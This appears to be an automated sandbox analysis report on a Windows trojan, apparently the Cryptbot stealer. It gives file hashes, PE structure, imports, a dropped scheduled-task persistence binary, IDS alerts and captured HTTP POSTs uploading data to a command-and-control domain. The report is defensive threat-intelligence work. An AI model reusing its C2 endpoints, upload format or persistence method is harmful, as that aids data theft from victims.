Analysis stop reason:	Timeout
Sample name:	lkOawAWJRO.exe renamed because original name is a hash value
Original Sample Name:	1b05ebbfcec15b251b93721338e525c8.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/2@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target lkOawAWJRO.exe, PID 5648 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:30:11	API Interceptor	3x Sleep call for process: lkOawAWJRO.exe modified
06:31:36	API Interceptor	559x Sleep call for process: service123.exe modified
12:31:04	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
80.66.81.78	vsYkceYJOX.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, Vidar	Browse	sevtvr17vt.top/v1/upload.php
80.66.81.78	nJohIBtNm5.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine	Browse	sevtvx17vs.top/v1/upload.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TEAM-HOSTASRU	vsYkceYJOX.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, Vidar	Browse	80.66.81.78
	nJohIBtNm5.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine	Browse	80.66.81.78
	UpU2O6YQxG.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	80.66.81.77
	skid.mpsl.elf	Get hash	malicious	Mirai, Moobot	Browse	185.231.244.61
	Cheater Pro 1.6.0.msi	Get hash	malicious	Unknown	Browse	80.66.81.208
	Cheat Lab 2.7.2.msi	Get hash	malicious	Unknown	Browse	80.66.81.208
	5WTG6N45CH.elf	Get hash	malicious	Mirai	Browse	185.231.244.77
	124.apk	Get hash	malicious	Hook	Browse	80.66.85.141
	wCsTvggsz2.exe	Get hash	malicious	DCRat, zgRAT	Browse	46.8.29.132
	ayVC6CI8s5.exe	Get hash	malicious	DCRat, zgRAT	Browse	46.8.29.132

Process:	C:\Users\user\Desktop\lkOawAWJRO.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315803136
Entropy (8bit):	0.054352357918072115
Encrypted:	false
SSDEEP:	24576:enUSRBO/35zIY7/KcNtHoptIIRvmd48WPn/T3fMoV7FcRlNVE:fBIZmNWPnzflVBcRlNVE
MD5:	C6604F3E41D007E0CB931CCD5779BB10
SHA1:	02233E9E95514AC467E392FB296671ACBEF5A567
SHA-256:	8870B0C9D5FB2EE08EE7496B39E63E4AFC782715AC947E3D08A1973F80682FF3
SHA-512:	0D0DA2DC6E8EDC121FE986B75EDE17612620607592052AF80CE0A4380AE5139E8C205C204801CEBCDE5ECA637691FA695B5935716E8A7BA971DAFEDBA02C2F6F
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........#...(...........................k.........................@............@... .........................`.......................................Hz...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..............................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..Hz.......\|...J..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\service123.exe

Download File

Process:	C:\Users\user\Desktop\lkOawAWJRO.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314617856
Entropy (8bit):	0.0023405856158797084
Encrypted:	false
SSDEEP:
MD5:	751D09B372396BF3012988CD55D9E27E
SHA1:	46640B9F3461D7C057B3D086F607736995188A2E
SHA-256:	4CEECBCC75B8876D5C0B47977628835F575DC497922CA6154215D2BDC4F0FEC2
SHA-512:	EFBA8A3F21413E9B390DD7E0E8F264D3534F37F3592887F50A856BB17149027541AAE3E663F18F87515FD6C5311D0EA424CC6FE767E2331C376E0D8954484AF4
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x..g...............(.v........................@.......................... ............@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............\|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	5.315284808680583
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	lkOawAWJRO.exe
File size:	6'840'320 bytes
MD5:	1b05ebbfcec15b251b93721338e525c8
SHA1:	475e17fb4ea6e1d41b18086c541c338b862e1bf4
SHA256:	ab30569e57ecb3c3d674890e89a90bebe8884071053a48c2a18dbf8ffc8aa7c3
SHA512:	4a947908cd362d359b76d7b8a7cf16635a0712ad35e0fe787441ca07f4d56eedd8f08ed5e04983f9d390efa30bae7e7e27f6d2328baa505a06435a26a720f150
SSDEEP:	49152:bJlOWXpWa3IO7tr7ppOdVDFQejeP7eevRwk8pJ4bK5l1dCSzbL7YI4oCK6yjzcwp:bJlzFP7hCVhQeSP7eepwbpJ4b
TLSH:	33667175DEDB42E6C6C30AB6A085F17F6D30FB018C39D6B6DE81DF55E361A22D588880
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...............(..H..\h...............H...@...........................h.....*.h...@... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6708C098 [Fri Oct 11 06:07:20 2024 UTC]
TLS Callbacks:	0x401800, 0x4017b0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	41db2083dac89343aef584a51a80b293

Entrypoint Preview

Instruction
mov dword ptr [00A1E070h], 00000001h
jmp 00007F2B446FFD96h
nop
mov dword ptr [00A1E070h], 00000000h
jmp 00007F2B446FFD86h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007F2B4470E43Eh
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 00A0C000h
call dword ptr [00A1F23Ch]
sub esp, 04h
test eax, eax
je 00007F2B44700155h
mov ebx, eax
mov dword ptr [esp], 00A0C000h
call dword ptr [00A1F270h]
mov edi, dword ptr [00A1F248h]
sub esp, 04h
mov dword ptr [00A1E028h], eax
mov dword ptr [esp+04h], 00A0C013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 00A0C029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [0088C004h], eax
test esi, esi
je 00007F2B447000F3h
mov dword ptr [esp+04h], 00A1E02Ch
mov dword ptr [esp], 00A1B104h
call esi
mov dword ptr [esp], 00401580h
call 00007F2B44700043h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x61f000	0xb78	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x622000	0x6a154	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x619384	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x61f21c	0x1cc	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x48aad8	0x48ac00	806202804bf4c24de0f8300a3a9b40a7	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x48c000	0x17f4e0	0x17f600	8aa117933a6ff49251c12302fdfe7d83	False	0.03556954576948158	dBase III DBT, version number 0, next free block index 10, 1st item "MLF"	0.5297491567291164	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x60c000	0xe464	0xe600	582e05c74fe3f623cd52b496b12ef3c7	False	0.244140625	data	5.923017472134589	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x61b000	0x210c	0x2200	181f5d0343865bf128e68ee095cc4580	False	0.32077205882352944	data	4.80280643259238	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x61e000	0xb74	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x61f000	0xb78	0xc00	e2f431baedb52b8ca3510abfc99cf0eb	False	0.4046223958333333	data	5.058618501212495	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x620000	0x30	0x200	947565758601e59a9e2e145caaaaefe2	False	0.064453125	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x621000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x622000	0x6a154	0x6a200	5f9ba49bd303717456e9f47e8a1f6017	False	0.1503331124852768	data	6.796403850541748	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptGenRandom, CryptReleaseContext
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, FreeLibrary, GetLastError, GetModuleHandleA, GetModuleHandleW, GetNativeSystemInfo, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetThreadLocale, HeapAlloc, HeapFree, InitializeCriticalSection, IsBadReadPtr, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, MultiByteToWideChar, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WideCharToMultiByte, lstrlenA
msvcrt.dll	__getmainargs, __initenv, __mb_cur_max, __p__acmdln, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _assert, _cexit, _errno, _chsize, _exit, _filelengthi64, _fileno, _initterm, _iob, _lock, _onexit, _unlock, _wcsnicmp, abort, atoi, bsearch, calloc, exit, fclose, fflush, fgetpos, fopen, fputc, fread, free, freopen, fsetpos, fwrite, getc, islower, isspace, isupper, isxdigit, localeconv, malloc, mbstowcs, memcmp, memcpy, memmove, memset, mktime, localtime, difftime, _mkdir, perror, qsort, realloc, remove, setlocale, signal, strchr, strcmp, strerror, strlen, strncmp, strncpy, strtol, strtoul, tolower, ungetc, vfprintf, time, wcslen, wcstombs, _stat, _write, _utime, _open, _fileno, _close, _chmod

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-12T12:30:12.478180+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.5	49704	80.66.81.78	80	TCP
2024-10-12T12:30:16.140581+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.5	49705	80.66.81.78	80	TCP
2024-10-12T12:30:21.029581+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.5	49718	80.66.81.78	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2024 12:30:11.331562042 CEST	49704	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:11.336744070 CEST	80	49704	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:11.336822033 CEST	49704	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:11.336981058 CEST	49704	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:11.337016106 CEST	49704	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:11.341888905 CEST	80	49704	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:11.341917992 CEST	80	49704	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:12.478060007 CEST	80	49704	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:12.478101969 CEST	80	49704	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:12.478131056 CEST	80	49704	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:12.478179932 CEST	49704	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:12.478179932 CEST	49704	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:12.478199005 CEST	80	49704	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:12.478271008 CEST	49704	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:12.478301048 CEST	49704	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:12.488202095 CEST	80	49704	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.082030058 CEST	49705	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:16.087038040 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.087249041 CEST	49705	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:16.087483883 CEST	49705	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:16.087483883 CEST	49705	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:16.092536926 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.092549086 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.092554092 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.092567921 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.092572927 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.092577934 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.092581987 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.092592955 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.092626095 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.092714071 CEST	49705	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:16.092746973 CEST	49705	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:16.097130060 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.097217083 CEST	49705	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:16.097608089 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.097626925 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.097642899 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.097677946 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.097697020 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.097714901 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.097796917 CEST	49705	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:16.140352011 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.140580893 CEST	49705	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:16.188368082 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.188477993 CEST	49705	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:16.236394882 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.236463070 CEST	49705	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:16.284456015 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.284528971 CEST	49705	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:16.332376957 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.332446098 CEST	49705	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:16.384387970 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:16.574300051 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:17.035027981 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:17.035078049 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:17.035239935 CEST	49705	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:17.035239935 CEST	49705	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:17.040086031 CEST	80	49705	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:20.188007116 CEST	49718	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:20.192914009 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:20.192986012 CEST	49718	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:20.193109989 CEST	49718	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:20.193164110 CEST	49718	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:20.197974920 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:20.197993994 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:20.198014975 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:20.198024035 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:20.198033094 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:20.198054075 CEST	49718	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:20.198054075 CEST	49718	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:20.198111057 CEST	49718	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:20.198362112 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:20.198378086 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:20.198390961 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:20.198400021 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:20.198417902 CEST	49718	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:20.198453903 CEST	49718	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:20.198456049 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:20.202964067 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:20.202972889 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:20.202992916 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:20.203006029 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:20.203020096 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:20.203028917 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:20.244374037 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:21.029442072 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:21.029581070 CEST	49718	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:21.029589891 CEST	80	49718	80.66.81.78	192.168.2.5
Oct 12, 2024 12:30:21.029669046 CEST	49718	80	192.168.2.5	80.66.81.78
Oct 12, 2024 12:30:21.034449100 CEST	80	49718	80.66.81.78	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2024 12:30:10.547028065 CEST	51668	53	192.168.2.5	1.1.1.1
Oct 12, 2024 12:30:11.323900938 CEST	53	51668	1.1.1.1	192.168.2.5
Oct 12, 2024 12:30:20.692953110 CEST	53	64553	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 12, 2024 12:30:10.547028065 CEST	192.168.2.5	1.1.1.1	0xfe8b	Standard query (0)	sevtvr17pt.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 12, 2024 12:30:11.323900938 CEST	1.1.1.1	192.168.2.5	0xfe8b	No error (0)	sevtvr17pt.top		80.66.81.78	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sevtvr17pt.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	80.66.81.78	80	5648	C:\Users\user\Desktop\lkOawAWJRO.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 12:30:11.336981058 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary70714139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtvr17pt.top
Oct 12, 2024 12:30:11.337016106 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 37 30 37 31 34 31 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 65 6a Data Ascii: ------Boundary70714139Content-Disposition: form-data; name="file"; filename="Hejijewu.bin"Content-Type: application/octet-streamB2+eyo$)b<:#u-H2?_;7im >Fiumj8>H'\w16%^3}MnImw
Oct 12, 2024 12:30:12.478060007 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 12 Oct 2024 10:30:11 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK
Oct 12, 2024 12:30:12.478199005 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 12 Oct 2024 10:30:11 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	80.66.81.78	80	5648	C:\Users\user\Desktop\lkOawAWJRO.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 12:30:16.087483883 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary60025149 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 89801 Host: sevtvr17pt.top
Oct 12, 2024 12:30:16.087483883 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 30 30 32 35 31 34 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 6f 7a Data Ascii: ------Boundary60025149Content-Disposition: form-data; name="file"; filename="Xozuzihow.bin"Content-Type: application/octet-streamJ+(Cx:i$V\|V6!ae`'tEBu-Kv*@p^_zR%V)`6+[-<}T
Oct 12, 2024 12:30:16.092714071 CEST	18540	OUT	Data Raw: 6a 47 3d 8f fd 69 9b 02 db cc 1f 7b 8f b5 02 b2 32 48 a9 c0 fb a6 e0 ad 69 68 a0 9b cd 07 49 da 12 cd 32 22 74 44 08 f6 62 92 43 4c 3e 5e f1 db fd 59 9b 63 32 30 35 c8 f3 af d8 11 b0 b3 88 47 3f 64 f1 f6 c8 96 a8 da 18 b7 ad 92 1e d8 45 2e 3c 04 Data Ascii: jG=i{2HihI2"tDbCL>^Yc205G?dE.<<jL::Kq7@S\cK]Op{sE`d'F^j]}05}^"xeGUu].W<9b" HILX.?">'9(!gJ:
Oct 12, 2024 12:30:16.092746973 CEST	2472	OUT	Data Raw: a2 e0 3c 4e ca 54 73 c6 c3 41 d5 19 9d f7 1f 1f 04 42 d3 2b c7 10 56 e8 b9 eb fe 46 1a 6d 71 1e 7d 02 21 48 0b 52 b5 f3 b4 49 4a 99 1f 50 de 9a 72 2a c8 8f 29 4b b5 e7 20 a9 3f 43 39 5b 7a ed 5d 05 eb 11 c6 c3 f2 5f f7 cc 77 ab 13 e8 8a 27 87 8d Data Ascii: <NTsAB+VFmq}!HRIJPr*)K ?C9[z]_w'}toVeQ:T:+Z2z}B1Hf5B\|%.I:OcK$X]zYOs>JA`}wby?JJ,l>60jUzuq=tIeZ,lHN
Oct 12, 2024 12:30:16.097217083 CEST	2472	OUT	Data Raw: 42 c9 0d 92 59 59 cf 5f e2 d8 97 52 d6 c4 7b 3a fd 41 ae 1f 28 ce 32 48 5c cb f8 92 dc 38 f0 59 69 6b 14 8f 26 ea 09 05 1f af 9e 5a 48 fe 01 65 90 c5 cd 69 20 82 b7 0d 26 c8 5c fe 61 cd 91 4d 45 bc a2 67 b6 90 12 af 70 bf 59 de f9 7b c7 f4 ad 74 Data Ascii: BYY_R{:A(2H\8Yik&ZHei &\aMEgpY{tgR["I=XzT&d{A{n!&:i:3a\|s1AD5XIl]QX!X/GWOv{+j>kB=7S{9ji&(k=
Oct 12, 2024 12:30:16.097796917 CEST	14832	OUT	Data Raw: 0a 3e 75 71 c6 41 e4 47 ba ec 05 f6 14 bb 60 47 f9 6c f7 ed d6 ff a7 0e b0 26 0f 41 70 a2 42 bd 2d 83 99 9e 12 e5 4a ae 18 91 0a c6 e8 91 bc de f3 35 7c 87 5e 1d 69 da f0 bb 2a a5 ef 07 e1 c7 a5 04 81 f3 02 21 32 df df 1b 6e 90 5f 47 4b 32 45 c4 Data Ascii: >uqAG`Gl&ApB-J5\|^i!2n_GK2E2ygx+/WC>cP?XI5Qm/3R(N45i+=21`rgg$`pmO\mG{H"CpEHg zRH[;'":@~v~(V
